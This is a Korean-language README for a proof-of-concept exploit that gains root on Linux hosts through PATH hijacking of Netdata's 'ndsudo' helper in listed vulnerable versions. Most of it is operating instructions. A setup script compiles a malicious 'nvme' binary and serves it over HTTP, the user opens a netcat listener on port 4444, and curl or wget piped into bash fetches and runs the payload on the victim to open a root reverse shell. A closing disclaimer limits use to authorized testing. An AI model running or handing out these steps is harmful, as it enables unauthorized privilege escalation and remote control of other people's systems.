
Bash 스크립트: "ndsudo"를 통한 권한 상승 (Netdata 로컬 익스플로잇)
"ndsudo"를 통한 권한 상승을 위한 Bash 스크립트 (Netdata 로컬 익스플로잇)
>= v1.45.0, < v1.45.3
>= v1.44.0-60, < v1.45.0-169
"ndsudo" 도구는 제한된 외부 명령어 집합을 실행하지만, 검색 경로는 "PATH" 환경 변수에 의해 제공됩니다. "PATH" 환경 변수를 우리가 접근 가능한 경로로 변경함으로써, ndsudo가 명령어를 찾는 위치를 제어하고 악성 코드를 포함한 명령어를 생성할 수 있습니다.
이 익스플로잇은 대상 머신과 공격자 머신이 동일한 네트워크에 있다는 가정에 기반합니다.
"setup_exploit_server.sh"를 실행하여 공격에 필요한 파일을 자동으로 생성하고 배포할 수 있습니다.
$ ./setup_exploit_server.sh YOUR_IP
--------- Exploit Infrastructure Setup by Ottanta ---------
[+] Using server IP: YOUR_IP
[+] Creating exploit directory: /tmp/exploit
[+] Creating ndsudo_pe.sh script file...
[+] Creating nvme.c exploit file...
[+] Compiling nvme binary...
[+] nvme binary compiled successfully
[+] Starting web server on port 80...
[+] Web server started with PID: 9350
[+] nvme binary is available at: http://YOUR_IP/nvme
[!] Now run the privilege escalation exploit in the victim terminal
[!] Make sure to start listener: nc -nlvp 4444
Press Enter to stop the web server and clean up...
이 스크립트는 공격에 필요한 모든 파일을 귀하의 IP 주소로 구성하여 생성합니다.
웹 서버를 배포한 후, 다른 셸에서 리스너를 시작합니다:
# We start a listener with Netcat, but you can use anything else
$ nc -nlvp 4444
listening on [any] 4444 ...
HTTP 클라이언트에 따라 익스플로잇을 다운로드하고 실행할 수 있습니다.
# If we have curl
$ curl -L http://YOUR_IP/ndsudo_pe.sh | bash -s -- YOUR_IP
# If we have wget
$ wget -qO- http://YOUR_IP/ndsudo_pe.sh | bash -s -- YOUR_IP
모든 것이 올바르게 수행되었다면, 이제 루트 셸을 얻을 수 있습니다.

이 개념 증명은 교육 및 승인된 테스트 목적으로만 제공됩니다. 귀하가 소유하지 않거나 명시적 테스트 권한이 없는 시스템에 대한 무단 사용은 불법입니다. 저자는 이 정보의 오용에 대해 책임을 지지 않습니다.